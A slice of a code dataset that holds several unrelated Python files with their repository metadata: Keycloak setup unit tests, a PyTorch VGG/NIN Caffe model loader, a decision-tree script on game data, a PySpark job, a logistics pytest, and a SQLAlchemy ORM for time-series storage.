test_create_keycloak_client_from_spec_all(self):\n client_id = str(mock.sentinel.client_id)\n spec = { # Sets all the possible keys\n 'type': 'public',\n 'standardFlowEnabled': True,\n 'implicitFlowEnabled': True,\n 'directAccessGrantsEnabled': True,\n 'serviceAccountsEnabled': True,\n 'authorizationServicesEnabled': True,\n 'proxiedHosts': [\n 'test1',\n 'test2',\n ],\n 'secret': {\n 'name': 'secret1',\n 'namespaces': ['namespace1', 'namespace2'],\n }\n }\n kcs = keycloak_setup.KeycloakSetup()\n customer_access_url = str(mock.sentinel.customer_access_url)\n res = keycloak_setup.create_keycloak_client_from_spec(\n client_id, spec, kcs, customer_access_url)\n self.assertEqual(kcs, res.kas)\n self.assertEqual(kcs.SHASTA_REALM_NAME, res.realm)\n self.assertEqual(client_id, res.id)\n self.assertEqual('secret1', res.k8s_secret_name)\n self.assertEqual(['namespace1', 'namespace2'], res.k8s_secret_namespaces)\n\n exp_secret_ext_attr = {\n 'discovery-url': f'{customer_access_url}/realms/shasta'\n }\n\n self.assertEqual(exp_secret_ext_attr, res._k8s_secret_ext_attr)\n self.assertIs(res.standard_flow_enabled, True)\n self.assertIs(res.implicit_flow_enabled, True)\n self.assertIs(res.direct_access_grants_enabled, True)\n self.assertIs(res.service_accounts_enabled, True)\n self.assertIs(res.authorization_services_enabled, True)\n self.assertIs(res.public_client, True)\n\n exp_ext_attr = {\n 'redirectUris': [\n 'https://test1/oauth/callback',\n 'https://test2/oauth/callback',\n ]\n }\n self.assertEqual(exp_ext_attr, res._kc_ext_attr)\n\n def test_k8s_get_secret(self):\n # Mocks out kubernetes CoreV1Api object and read_namespaced_secret()\n # method.\n v1 = mock.Mock()\n v1.read_namespaced_secret.return_value = mock.sentinel.v1_secret\n\n # Sentinel inputs for verification\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.name)\n\n secret = keycloak_setup.k8s_get_secret(ns, name, v1=v1)\n\n # Verify expected secret returned\n self.assertIs(secret, mock.sentinel.v1_secret)\n\n # Verify that read_namespaced_secret called with expected inputs\n v1.read_namespaced_secret.assert_called_once_with(name, ns)\n\n 
def test_k8s_get_secret_not_found(self):\n # Mocks out kubernetes CoreV1Api object and read_namespaced_secret()\n # method.\n v1 = mock.Mock()\n v1.read_namespaced_secret.side_effect = rest.ApiException(404)\n\n # Sentinel inputs for verification\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.name)\n\n secret = keycloak_setup.k8s_get_secret(ns, name, v1=v1)\n\n # Verify return secret is None\n self.assertIsNone(secret)\n\n # Verify that read_namespaced_secret called with expected inputs\n v1.read_namespaced_secret.assert_called_once_with(name, ns)\n\n def test_k8s_get_secret_fails(self):\n # Mocks out kubernetes CoreV1Api object and read_namespaced_secret()\n # method.\n v1 = mock.Mock()\n v1.read_namespaced_secret.side_effect = rest.ApiException(401)\n\n # Sentinel inputs for verification\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.name)\n\n # Verify exception is raised\n self.assertRaises(\n rest.ApiException,\n keycloak_setup.k8s_get_secret, ns, name, v1=v1,\n )\n\n # Verify that read_namespaced_secret called with expected inputs\n v1.read_namespaced_secret.assert_called_once_with(name, ns)\n\n def test_k8s_apply_secret(self):\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return None to create a new secret\n v1.read_namespaced_secret.return_value = None\n v1.create_namespaced_secret.return_value = None\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n secret = keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n\n # Verify create_namespaced_secret() called\n v1.create_namespaced_secret.assert_called_once_with(ns, secret)\n\n # Verify created secret\n self.assertEqual(secret.metadata.name, name)\n self.assertEqual(secret.metadata.namespace, ns)\n self.assertEqual(secret.data['key'], base64.b64encode(bytes('value', 'utf-8')).decode(\"ascii\"))\n\n def test_k8s_apply_secret_conflict(self):\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return None to create a new secret\n v1.read_namespaced_secret.return_value = None\n # Cause create_namespaced_secret() to raise 409\n v1.create_namespaced_secret.side_effect = rest.ApiException(409)\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n # No exception raised is expected for 409, but still verify\n # create_namespaced_secret() called\n v1.create_namespaced_secret.assert_called_once_with(ns, mock.ANY)\n\n def test_k8s_apply_secret_raises(self):\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return None to create a new secret\n v1.read_namespaced_secret.return_value = None\n # Cause create_namespaced_secret() to raise non-409\n v1.create_namespaced_secret.side_effect = rest.ApiException(401)\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n self.assertRaises(\n rest.ApiException,\n keycloak_setup.k8s_apply_secret, ns, name, data, v1=v1,\n )\n\n # Verify create_namespaced_secret() called\n v1.create_namespaced_secret.assert_called_once_with(ns, mock.ANY)\n\n def test_k8s_apply_secret_no_change(self):\n existing_secret = mock.MagicMock()\n existing_secret.data = {'key': base64.b64encode(bytes('value', 'utf-8')).decode(\"ascii\")}\n\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return a mocked secret\n v1.read_namespaced_secret.return_value = existing_secret\n # Ensure that patched_namespaced_secret() isn't 
called\n v1.patch_namespaced_secret.side_effect = RuntimeError('called')\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n self.assertIs(\n existing_secret,\n keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n )\n\n def test_k8s_apply_secret_update(self):\n existing_secret = mock.MagicMock()\n existing_secret.data = {'key': base64.b64encode(bytes('old-value', 'utf-8')).decode(\"ascii\")}\n\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return a mocked secret\n v1.read_namespaced_secret.return_value = existing_secret\n v1.patch_namespaced_secret.return_value = None\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'new-value'}\n\n secret = keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n\n # Verify patched_namespaced_secret() called\n v1.patch_namespaced_secret.assert_called_once_with(name, ns, secret)\n\n # Verify patched secret has new value\n self.assertEqual(secret.data['key'], base64.b64encode(bytes('new-value', 'utf-8')).decode(\"ascii\"))\n\n def test_read_keycloak_master_admin_secrets_no_files_default(self):\n tmp_dir = self.useFixture(fixtures.TempDir()).path\n ret = keycloak_setup.read_keycloak_master_admin_secrets(\n secret_dir=tmp_dir)\n exp = {\n 'password': 'adminpwd', 'user': 'admin', 'client_id': 'admin-cli'}\n self.assertEqual(exp, ret)\n\n def test_read_keycloak_master_admin_secrets_files(self):\n tmp_dir = self.useFixture(fixtures.TempDir()).path\n with open('{}/client-id'.format(tmp_dir), 'w') as f:\n f.write(str(mock.sentinel.client_id))\n with open('{}/user'.format(tmp_dir), 'w') as f:\n f.write(str(mock.sentinel.user))\n with open('{}/password'.format(tmp_dir), 'w') as f:\n f.write(str(mock.sentinel.password))\n\n ret = keycloak_setup.read_keycloak_master_admin_secrets(\n secret_dir=tmp_dir)\n exp = {\n 'password': str(mock.sentinel.password),\n 'user': str(mock.sentinel.user),\n 'client_id': str(mock.sentinel.client_id),\n }\n self.assertEqual(exp, ret)\n\n def test_main(self):\n self.useFixture(fixtures.EnvironmentVariable(\n 'KEYCLOAK_OAUTH2_PROXY_CLIENT_PROXIED_HOSTS', '[]'))\n\n self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.kubernetes.config, 'load_incluster_config'))\n rkmas_ret = {\n 'client_id': str(mock.sentinel.client_id),\n 'user': str(mock.sentinel.user),\n 'password': str(mock.sentinel.password),\n }\n rkmas_mock = self.useFixture(\n fixtures.MockPatchObject(\n keycloak_setup, 'read_keycloak_master_admin_secrets',\n return_value=rkmas_ret)).mock\n kcs_mock = self.useFixture(\n fixtures.MockPatchObject(keycloak_setup, 'KeycloakSetup',\n autospec=True)).mock\n\n client_mock = self.useFixture(\n fixtures.MockPatchObject(keycloak_setup, 'KeycloakClient',\n autospec=True)).mock\n\n keycloak_setup.main()\n\n rkmas_mock.assert_called_once_with()\n\n exp_clients_to_cleanup = ['gatekeeper']\n exp_secrets_to_cleanup = [{'name': 'keycloak-gatekeeper-client', 'namespaces': ['services']}]\n kcs_mock.assert_called_once_with(\n keycloak_base=None,\n cluster_keycloak_base=None,\n kc_master_admin_client_id=str(mock.sentinel.client_id),\n kc_master_admin_password=str(mock.sentinel.password),\n kc_master_admin_username=str(mock.sentinel.user),\n customer_access_url=None,\n clients_to_cleanup=exp_clients_to_cleanup,\n secrets_to_cleanup=exp_secrets_to_cleanup,\n )\n\n kcs_mock.return_value.run.assert_called_once_with()\n client_mock.assert_called()\n\n def test_get_wlm_client(self):\n cluster_keycloak_base = 
'https://api-gw-service-nmn.local/keycloak'\n kcs = keycloak_setup.KeycloakSetup()\n wlm_client = keycloak_setup.get_wlm_client(kcs, cluster_keycloak_base)\n\n self.assertEqual(wlm_client.id, 'wlm-client')\n self.assertEqual(wlm_client.realm, 'shasta')\n self.assertEqual(wlm_client.k8s_secret_name, 'wlm-client-auth')\n self.assertEqual(wlm_client.k8s_secret_namespaces, ['default'])\n self.assertFalse(wlm_client.public_client)\n self.assertFalse(wlm_client.standard_flow_enabled)\n self.assertFalse(wlm_client.implicit_flow_enabled)\n self.assertFalse(wlm_client.direct_access_grants_enabled)\n self.assertTrue(wlm_client.service_accounts_enabled)\n","repo_name":"Cray-HPE/keycloak-installer","sub_path":"tests/test_keycloak_setup.py","file_name":"test_keycloak_setup.py","file_ext":"py","file_size_in_byte":52802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44892066094","text":"import torch\nimport torch.nn as nn\n\n\nclass VGG(nn.Module):\n def __init__(self, features, num_classes=1000):\n super(VGG, self).__init__()\n self.features = features\n self.classifier = nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, num_classes),\n )\n\n\nclass NIN(nn.Module):\n def __init__(self, pooling):\n super(NIN, self).__init__()\n if pooling == 'max':\n pool2d = nn.MaxPool2d((3, 3),(2, 2),(0, 0),ceil_mode=True)\n elif pooling == 'avg':\n pool2d = nn.AvgPool2d((3, 3),(2, 2),(0, 0),ceil_mode=True)\n\n self.features = nn.Sequential(\n nn.Conv2d(3,96,(11, 11),(4, 4)),\n nn.ReLU(inplace=True),\n nn.Conv2d(96,96,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(96,96,(1, 1)),\n nn.ReLU(inplace=True),\n pool2d,\n nn.Conv2d(96,256,(5, 5),(1, 1),(2, 2)),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,(1, 1)),\n nn.ReLU(inplace=True),\n pool2d,\n nn.Conv2d(256,384,(3, 3),(1, 1),(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(384,384,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(384,384,(1, 1)),\n nn.ReLU(inplace=True),\n pool2d,\n nn.Dropout(0.5),\n nn.Conv2d(384,1024,(3, 3),(1, 1),(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(1024,1024,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(1024,1000,(1, 1)),\n nn.ReLU(inplace=True),\n nn.AvgPool2d((6, 6),(1, 1),(0, 0),ceil_mode=True),\n nn.Softmax(),\n )\n\n\n\ndef buildSequential(channel_list, pooling):\n layers = []\n in_channels = 3\n if pooling == 'max':\n pool2d = nn.MaxPool2d(kernel_size=2, stride=2)\n elif pooling == 'avg':\n pool2d = nn.AvgPool2d(kernel_size=2, stride=2)\n else: \n raise ValueError(\"Unrecognized pooling parameter\")\n for c in channel_list:\n if c == 'P':\n layers += [pool2d]\n else:\n conv2d = nn.Conv2d(in_channels, c, kernel_size=3, padding=1)\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = c\n return nn.Sequential(*layers)\n\n\nchannel_list = {\n'VGG-16': [64, 64, 'P', 128, 128, 'P', 256, 256, 256, 'P', 512, 512, 512, 'P', 512, 512, 512, 'P'],\n'VGG-19': [64, 64, 'P', 128, 128, 'P', 256, 256, 256, 256, 'P', 512, 512, 512, 512, 'P', 512, 512, 512, 512, 'P'],\n}\n\nnin_dict = {\n'C': ['conv1', 'cccp1', 'cccp2', 'conv2', 'cccp3', 'cccp4', 'conv3', 'cccp5', 'cccp6', 'conv4-1024', 'cccp7-1024', 'cccp8-1024'], \n'R': ['relu0', 'relu1', 'relu2', 'relu3', 'relu5', 'relu6', 'relu7', 'relu8', 'relu9', 'relu10', 'relu11', 'relu12'],\n'P': ['pool1', 'pool2', 'pool3', 'pool4'],\n'D': ['drop'],\n}\nvgg16_dict = {\n'C': ['conv1_1', 
'conv1_2', 'conv2_1', 'conv2_2', 'conv3_1', 'conv3_2', 'conv3_3', 'conv4_1', 'conv4_2', 'conv4_3', 'conv5_1', 'conv5_2', 'conv5_3'],\n'R': ['relu1_1', 'relu1_2', 'relu2_1', 'relu2_2', 'relu3_1', 'relu3_2', 'relu3_3', 'relu4_1', 'relu4_2', 'relu4_3', 'relu5_1', 'relu5_2', 'relu5_3'],\n'P': ['pool1', 'pool2', 'pool3', 'pool4', 'pool5'],\n}\nvgg19_dict = {\n'C': ['conv1_1', 'conv1_2', 'conv2_1', 'conv2_2', 'conv3_1', 'conv3_2', 'conv3_3', 'conv3_4', 'conv4_1', 'conv4_2', 'conv4_3', 'conv4_4', 'conv5_1', 'conv5_2', 'conv5_3', 'conv5_4'],\n'R': ['relu1_1', 'relu1_2', 'relu2_1', 'relu2_2', 'relu3_1', 'relu3_2', 'relu3_3', 'relu3_4', 'relu4_1', 'relu4_2', 'relu4_3', 'relu4_4', 'relu5_1', 'relu5_2', 'relu5_3', 'relu5_4'],\n'P': ['pool1', 'pool2', 'pool3', 'pool4', 'pool5'],\n}\n\n\ndef modelSelector(model_file, pooling):\n if \"vgg\" in model_file:\n if \"19\" in model_file:\n print(\"VGG-19 Architecture Detected\")\n cnn, layerList = VGG(buildSequential(channel_list['VGG-19'], pooling)), vgg19_dict\n elif \"16\" in model_file:\n print(\"VGG-16 Architecture Detected\")\n cnn, layerList = VGG(buildSequential(channel_list['VGG-16'], pooling)), vgg16_dict\n else:\n raise ValueError(\"VGG architecture not recognized.\") \n elif \"nin\" in model_file:\n print(\"NIN Architecture Detected\")\n cnn, layerList = NIN(pooling), nin_dict\n else:\n raise ValueError(\"Model architecture not recognized.\")\n return cnn, layerList\n\n# Print like Torch7/loadcaffe\ndef print_loadcaffe(cnn, layerList): \n c = 0\n for l in list(cnn):\n if \"Conv2d\" in str(l):\n in_c, out_c, ks = str(l.in_channels), str(l.out_channels), str(l.kernel_size)\n print(layerList['C'][c] +\": \" + (out_c + \" \" + in_c + \" \" + ks).replace(\")\",'').replace(\"(\",'').replace(\",\",'') )\n c+=1\n if c == len(layerList['C']):\n break\n\n# Load the model, and configure pooling layer type\ndef loadCaffemodel(model_file, pooling, use_gpu):\n cnn, layerList = modelSelector(str(model_file).lower(), pooling)\n cnn.load_state_dict(torch.load(model_file))\n print(\"Successfully loaded \" + str(model_file))\n\n # Maybe convert the model to cuda now, to avoid later issues\n if use_gpu > -1:\n cnn = cnn.cuda()\n cnn = cnn.features \n\n print_loadcaffe(cnn, layerList)\n\n return cnn, layerList","repo_name":"snehavenkataramana/ColorizationAndStyleTransferToBWVideos","sub_path":"CaffeLoader.py","file_name":"CaffeLoader.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15824109164","text":"import time\r\nimport pandas as pd\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.tree import export_graphviz\r\nfrom six import StringIO\r\nimport pydotplus\r\nimport os\r\n\r\n# Import the data\r\n# -----You should check the path before running the code-----\r\ncol_names = ['gameId', 'creationTime', 'gameDuration', 'seasonId', 'winner',\r\n 'firstBlood', 'firstTower', 'firstInhibitor', 'firstBaron', 'firstDragon', 'firstRiftHerald',\r\n 't1_towerKills', 't1_inhibitorKills', 't1_baronKills', 't1_dragonKills', 't1_riftHeraldKills',\r\n 't2_towerKills', 't2_inhibitorKills', 't2_baronKills', 't2_dragonKills', 't2_riftHeraldKills']\r\ndata = pd.read_csv(\"F:/各个学科/工业大数据/lab/project1/data/new_data.csv\", header=None, names=col_names)\r\ntest = pd.read_csv(\"F:/各个学科/工业大数据/lab/project1/data/test_set.csv\", header=None, names=col_names)\r\ndata = data.iloc[1:]\r\ntest = test.iloc[1:]\r\nfeature_cols = 
['firstBlood', 'firstTower', 'firstInhibitor', 'firstBaron', 'firstDragon',\r\n 't1_towerKills', 't1_inhibitorKills', 't1_baronKills', 't1_dragonKills', 't1_riftHeraldKills',\r\n 't2_towerKills', 't2_inhibitorKills', 't2_baronKills', 't2_dragonKills', 't2_riftHeraldKills']\r\nX_train = data[feature_cols]\r\ny_train = data.winner\r\nX_test = test[feature_cols]\r\ny_test = test.winner\r\n\r\n# Create a tree\r\nDT_clf = DecisionTreeClassifier(criterion='entropy', max_depth=7, min_samples_split=15)\r\n\r\n# Calculate the Training time\r\ntime_start = time.time()\r\nDT_clf = DT_clf.fit(X_train, y_train)\r\ntime_end = time.time()\r\nprint('Training time: ', time_end - time_start)\r\n\r\n# Apply the tree\r\ny_pred = DT_clf.predict(X_test)\r\nprint(\"Accuracy:\", accuracy_score(y_test, y_pred))\r\n\r\n# Visualize the decision tree\r\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\r\ndot_data = StringIO()\r\nexport_graphviz(DT_clf, out_file=dot_data, filled=True, rounded=True, special_characters=True, feature_names=feature_cols,\r\n class_names=['0', '1'])\r\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\r\ngraph.write_png('tree.png')\r\n\r\n\r\n\r\n","repo_name":"1511pspsps/BigData_Project1","sub_path":"DT.py","file_name":"DT.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41546496962","text":"from pyspark import SparkContext\nfrom pyspark import SparkConf\n\n\nconf = SparkConf().setMaster(\"local[*]\")\ncontext = SparkContext.getOrCreate(conf)\nartists = context.textFile(\"../datasets/artists.csv\")\nartistMapping = artists.map(lambda x: x.split(\",\"))\n\noldestArtist = artistMapping.map(lambda artist: artist[4]).min()\n\nprint(\"Year of birth of oldest artist:\" + str(oldestArtist))\n\n","repo_name":"ErikSteLarsen/TDT4305_Project","sub_path":"task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69986596945","text":"import os\n\nimport pytest\nimport pandas as pd\n\nfrom dtocean_logistics.feasibility.electrical import dynamic_feas\n\nthis_dir = os.path.dirname(os.path.realpath(__file__))\ndata_dir = os.path.join(this_dir, \"..\", \"test_data\")\n\n\n@pytest.fixture(scope=\"module\")\ndef dynamic_cable():\n \n path = os.path.join(data_dir, \"dynamic_cable.xlsx\")\n df = pd.read_excel(path, index_col=0)\n \n return df\n\n\n@pytest.fixture(scope=\"module\")\ndef connectors():\n \n path = os.path.join(data_dir, \"connectors.xlsx\")\n df = pd.read_excel(path, index_col=0)\n \n return df\n\n\ndef test_dynamic_feas(site, dynamic_cable, connectors):\n\n (feas_e,\n feas_v,\n feas_m_pv,\n feas_m_pe,\n feas_m_ve,\n deck_req) = dynamic_feas(None, None, site, dynamic_cable, connectors)\n \n assert \"rov\" in feas_e\n assert set(feas_v.keys()) == set(['CLB', 'CLV'])\n assert set(feas_m_pv.keys()) == set(['CLB', 'CLV'])\n assert not feas_m_pe\n assert \"rov\" in feas_m_ve\n assert all([v >= 0 for k, v in deck_req.items()])\n","repo_name":"DTOcean/dtocean-logistics","sub_path":"tests/test_feasibility_electrical.py","file_name":"test_feasibility_electrical.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34426672271","text":"# -*- coding: utf-8 -*-\n#SQLAlchemyORM.py\n#-------------------------------\n# Created By : Matthew 
Kastl\n# Created Date: 3/26/2023\n# version 9.0\n#-------------------------------\n\"\"\" This file is an implementation of the SQLAlchemy ORM geared towards Semaphore and its schema. \n \"\"\" \n#-------------------------------\n# \n#\n#Imports\nimport sys\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) \nsys.path.append(os.path.dirname(SCRIPT_DIR))\n\nfrom sqlalchemy import create_engine as sqlalchemy_create_engine\nfrom sqlalchemy import Table, Column, Integer, String, DateTime, Float, MetaData, UniqueConstraint, Engine, ForeignKey, insert, CursorResult, Select, select, distinct, Boolean, Interval\nfrom os import getenv\nfrom datetime import timedelta, datetime\n\nfrom src.SeriesStorage.ISeriesStorage import ISeriesStorage\n\nfrom DataClasses import Series, SeriesDescription, SemaphoreSeriesDescription, Input, Output, TimeDescription\nfrom utility import log\n\nclass SQLAlchemyORM(ISeriesStorage):\n \n def __init__(self) -> None:\n \"\"\"Constructor generates an a db schema. Automatically creates the \n metadata object holding the defined schema.\n \"\"\"\n self.__create_schema()\n self.__create_engine(getenv('DB_LOCATION_STRING'), False)\n\n #############################################################################################\n ################################################################################## Public methods\n #############################################################################################\n\n def select_input(self, seriesDescription: SeriesDescription, timeDescription : TimeDescription) -> Series:\n \"\"\"Selects a given series given a SeriesDescription and TimeDescription\n :param seriesDescription: SeriesDescription - A series description object\n :param timeDescription: TimeDescription - A hydrated time description object\n \"\"\"\n\n # Datum is stored in the db as the string 'None' if there is no datum, we need to convert it here before the query\n datumSearchTerm = 'None' if seriesDescription.dataDatum == None else seriesDescription.dataDatum\n\n statement = (select(self.inputs)\n .where(self.inputs.c.dataSource == seriesDescription.dataSource)\n .where(self.inputs.c.dataLocation == seriesDescription.dataLocation)\n .where(self.inputs.c.dataSeries == seriesDescription.dataSeries)\n .where(self.inputs.c.dataDatum == datumSearchTerm)\n .where(self.inputs.c.verifiedTime >= timeDescription.fromDateTime)\n .where(self.inputs.c.verifiedTime <= timeDescription.toDateTime)\n )\n tupleishResult = self.__dbSelection(statement).fetchall()\n inputResult = self.__splice_input(tupleishResult)\n\n # If an interval was provided, we will mod each verified time against it\n # any that fail we remove\n if timeDescription.interval != None:\n for input in inputResult:\n if not (input.timeVerified.timestamp() % timeDescription.interval.total_seconds() == 0):\n inputResult.remove(input)\n\n series = Series(seriesDescription, True, timeDescription)\n series.data = inputResult\n return series\n \n def select_output(self, semaphoreSeriesDescription: SemaphoreSeriesDescription, timeDescription : TimeDescription) -> Series:\n \"\"\"Selects an output series given a SemaphoreSeriesDescription and TimeDescription\n :param semaphoreSeriesDescription: SemaphoreSeriesDescription - A semaphore series description object\n :param timeDescription: TimeDescription - A hydrated time description object\n \"\"\"\n\n series = Series(semaphoreSeriesDescription, True, timeDescription)\n \n\n #Get the lead time for time calculations\n statement = 
(select(distinct(self.outputs.c.leadTime))\n .where(self.outputs.c.dataLocation == semaphoreSeriesDescription.dataLocation)\n .where(self.outputs.c.dataSeries == semaphoreSeriesDescription.dataSeries)\n .where(self.outputs.c.dataDatum == semaphoreSeriesDescription.dataDatum)\n )\n leadTimes = self.__dbSelection(statement).fetchall()\n if len(self.__dbSelection(statement).fetchall()) == 0: #If no lead time is found for some reason return nothing and log this\n log(f'SQLAlchemyORM | select_output | No leadtime found for SemaphoreSeriesDescription:{semaphoreSeriesDescription}')\n return series\n \n leadTime = leadTimes[0]\n fromGeneratedTime = timeDescription.fromDateTime - leadTime[0]\n toGeneratedTime = timeDescription.toDateTime - leadTime[0]\n \n statement = (select(self.outputs)\n .where(self.outputs.c.dataLocation == semaphoreSeriesDescription.dataLocation)\n .where(self.outputs.c.dataSeries == semaphoreSeriesDescription.dataSeries)\n .where(self.outputs.c.dataDatum == semaphoreSeriesDescription.dataDatum)\n .where(self.outputs.c.timeGenerated >= fromGeneratedTime)\n .where(self.outputs.c.timeGenerated <= toGeneratedTime)\n )\n tupleishResult = self.__dbSelection(statement).fetchall()\n outputResult = self.__splice_output(tupleishResult)\n series.data = outputResult\n return series\n \n def find_external_location_code(self, sourceCode: str, location: str, priorityOrder: int = 0) -> str:\n \"\"\"Returns a data source location code based off of passed parameters\n :param sourceCode: str - the data source code (noaaT&C)\n :param location: str - the local location name \n :param priorityOrder: int - priority of which locations to go to if one is unavailable \n \"\"\"\n statement = (select(self.dataLocation_dataSource_mapping.c.dataSourceLocationCode)\n .where(self.dataLocation_dataSource_mapping.c.dataSourceCode == sourceCode)\n .where(self.dataLocation_dataSource_mapping.c.dataLocationCode == location)\n .where(self.dataLocation_dataSource_mapping.c.priorityOrder == priorityOrder)\n )\n dataSourceLocationCode = self.__dbSelection(statement).fetchall()[0]\n return dataSourceLocationCode[0]\n\n def find_lat_lon_coordinates(self, locationCode: str) -> tuple:\n \"\"\"Returns lat and lon tuple\n :param sourceCode: str - the data source code (noaaT&C)\n :param location: str - the local location name \n :param priorityOrder: int - priority of which locations to go to if one is unavailable \n \"\"\"\n statement = (select(self.ref_dataLocation.c.latitude, self.ref_dataLocation.c.longitude)\n .where(self.ref_dataLocation.c.code == locationCode)\n )\n latLon = self.__dbSelection(statement).first()\n return (latLon[0], latLon[1])\n \n\n def insert_input(self, series: Series) -> Series:\n \"\"\"This method inserts actual/predictions into the input table\n :param series: Series - A series object with a time description, series description, and input data\n :return Series - A series object that contains the actually inserted data\n \"\"\"\n\n if(type(series.description).__name__ != 'SeriesDescription'): raise ValueError('Description should be type SeriesDescription')\n\n # Construct DB row to insert\n now = datetime.now()\n insertionRows = []\n for input in series.data:\n insertionValueRow = {\"isActual\": None, \"generatedTime\": None, \"isActual\": None,\"acquiredTime\": None, \"verifiedTime\": None, \"dataValue\": None, \"dataUnit\": None, \"dataSource\": None, \"dataLocation\": None, \"dataDatum\": None, \"latitude\": None, \"longitude\": None}\n insertionValueRow[\"generatedTime\"] = 
input.timeGenerated\n insertionValueRow[\"acquiredTime\"] = now\n insertionValueRow[\"verifiedTime\"] = input.timeVerified\n insertionValueRow[\"dataValue\"] = input.dataValue\n insertionValueRow[\"isActual\"] = False if series.description.dataSeries[0] == 'p' else True\n insertionValueRow[\"dataUnit\"] = input.dataUnit\n insertionValueRow[\"dataSource\"] = series.description.dataSource\n insertionValueRow[\"dataLocation\"] = series.description.dataLocation\n insertionValueRow[\"dataSeries\"] = series.description.dataSeries\n insertionValueRow[\"dataDatum\"] = 'None' if series.description.dataDatum == None else series.description.dataDatum\n insertionValueRow[\"latitude\"] = input.latitude\n insertionValueRow[\"longitude\"] = input.longitude\n insertionRows.append(insertionValueRow)\n\n with self.__get_engine().connect() as conn:\n cursor = conn.execute(insert(self.inputs)\n .returning(self.inputs)\n .values(insertionRows)\n .prefix_with('OR IGNORE')\n )\n result = cursor.fetchall()\n conn.commit()\n\n resultSeries = Series(series.description, True, series.timeDescription)\n resultSeries.data = self.__splice_input(result) #Turn tuple objects into actual objects\n return resultSeries\n \n\n\n def insert_output(self, series: Series) -> Series:\n \"\"\"This method inserts actual/predictions into the output table\n :param series: Series - A series object with a time description, semaphore series description, and outputdata\n :return Series - A series object that contains the actually inserted data\n \"\"\"\n\n if(type(series.description).__name__ != 'SemaphoreSeriesDescription'): raise ValueError('Description should be type SemaphoreSeriesDescription')\n\n insertionValueRows = []\n for output in series.data:\n insertionValueRow = {\"timeGenerated\": None, \"leadTime\": None, \"modelName\": None, \"dataValue\": None, \"dataUnit\": None, \"dataLocation\": None, \"dataSeries\": None, \"dataDatum\": None}\n insertionValueRow[\"timeGenerated\"] = output.timeGenerated\n insertionValueRow[\"leadTime\"] = output.leadTime\n insertionValueRow[\"modelName\"] = series.description.modelName\n insertionValueRow[\"modelVersion\"] = series.description.modelVersion\n insertionValueRow[\"dataValue\"] = output.dataValue\n insertionValueRow[\"dataUnit\"] = output.dataUnit\n insertionValueRow[\"dataLocation\"] = series.description.dataLocation\n insertionValueRow[\"dataSeries\"] = series.description.dataSeries\n insertionValueRow[\"dataDatum\"] = series.description.dataDatum\n \n insertionValueRows.append(insertionValueRow)\n\n with self.__get_engine().connect() as conn:\n cursor = conn.execute(insert(self.outputs)\n .returning(self.outputs)\n .values(insertionValueRows)\n .prefix_with('OR IGNORE')\n )\n result = cursor.fetchall()\n conn.commit()\n\n resultSeries = Series(series.description, True, series.timeDescription)\n resultSeries.data = self.__splice_output(result) #Turn tuple objects into actual objects\n return resultSeries\n \n\n def create_DB(self) -> None:\n \"\"\"Creates the database with the tethered engine.\n Requires the engine to be created before it will create the DB.\n See: DBManager.create_engine()\n \"\"\"\n\n self._metadata.create_all(self.__get_engine())\n \n\n def drop_DB(self) -> None:\n \"\"\"Drops the database with the tethered engine.\n Requires the engine to be created before it will drop the DB.\n See: DBManager.create_engine()\n \"\"\"\n\n self._metadata.drop_all(self.__get_engine())\n\n #############################################################################################\n 
